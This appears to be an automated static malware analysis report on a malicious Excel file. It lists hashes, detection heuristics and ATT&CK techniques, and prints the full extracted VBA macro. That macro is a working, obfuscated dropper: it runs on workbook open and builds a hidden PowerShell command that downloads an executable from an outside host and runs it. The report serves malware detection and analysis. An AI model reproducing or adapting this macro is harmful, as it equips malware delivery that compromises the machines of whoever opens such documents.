Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 828f5236e6484393…

MALICIOUS

Office (OLE)

77.0 KB Created: 2018-05-03 08:36:42 Authoring application: Microsoft Excel First seen: 2019-02-10
MD5: a5d9d8b01d6495e8ab00b5065023eb3e SHA-1: bf22d3c947b2a61cbffbf9d4aa8c652bdf675252 SHA-256: 828f5236e64843931d83676177a8961b58d5a8de8678da215366777f3ed0b57e
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is an Excel file containing a Workbook_Open VBA macro. This macro constructs and executes a PowerShell command that downloads a file from 'http://rhemet.co/bkr"' and saves it as a .exe file on the desktop. The macro uses string concatenation to obfuscate the PowerShell command and the download URL.

Heuristics 4

  • ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2563 bytes
SHA-256: 96319e08e5ed3c44717d4ce56c3af9dcaa15cc57fc680dfda150060fa82acf87
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function luaasiaa()
luaasiaa = "Op" + "roF" + "I -W"
End Function






Function stakabills()
stakabills = "$7d0m" + "K6 = [Typ" + "E](\""{1}{" + "0}{3}{2}\"" -f 'on','E" + "nVIr','Nt','ME') ;  "
End Function

Function fuokalabel()
If 191 > 100 Then
blackandfiire = "eR"
fuokalabel = blackandfiire + "shE"
End If
End Function


Function deomitriss()
deomitriss = "d" + "o{&(" + "\""{1}{" + "0}\"" -f'ep'" + ",'sle'" + ") 33;" + "${D`es} =  " + gloglue + "::gET" + "fo" + "lD" + "eRP" + "aTH(\""De" + "skt" + "op\"");(&(" + "\""{" + "0}{1}{2}\"" -f" + "'Ne','w-','O" + "bject') "
End Function


Function gloglue()
If 1234 > -56 Then
gloglue = "$7d" + "0mk6"
End If
End Function


Function attos()
Dim favekoliss As String
Randomize
favekoliss = Int(Rnd * 7890090#)
sedefegol = "while(!${?});" + "&(\""{0}{2}{3}{1}\""-f 'St','oces" + "s','art','-Pr') $Des\" + favekoliss + ".exe"""
berderelovic = juhiiooo + "tp://rhemet.co/bkr\"",\""$Des\" + favekoliss + ".exe\"")}"
attos = berderelovic + sedefegol
End Function
Function juhiiooo()
nbviimee = "(\""{0" + "}{2"
juhiiooo = nbviimee + "}{1}{3}{5}{" + "6}{4}\""-f'Sy','te','s" + "','m.N" + "e','ent','t" + ".Web','Cli')).downLOadFiLE.InVokE(\""ht"
End Function



Sub Workbook_Open()
If sigdetNumberOfMonitors > 1 Then

paparazzzi = stakabills + deomitriss + attos
faramall = wolfandcat & paparazzzi
Shell faramall, BackstageGroupStyleNormal
End If
End Sub

Function wolfandcat()
If sigdetDocPreviewImg > 2 Then
tumerasdwr = "noN" + "InT"
smugleoddf = " -N"
apogeuses = "cm"

sandermenus = Array(Hour(Now), "DEN", Second(Now))
trnadeok = Array(Now(), "ass  " + "  """, Minute(Now), Minute(Now), "d   " + "/c""", Now())
wolfandcat = apogeuses + trnadeok(4) + "pOW" + fuokalabel + "Ll -n" + luaasiaa + "In  hiD" + sandermenus(1) + smugleoddf + "OLo -" + tumerasdwr + "eRA  -eX" + "eCU" + "TI" + "oNp bYp" + trnadeok(1)
End If
End Function




Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True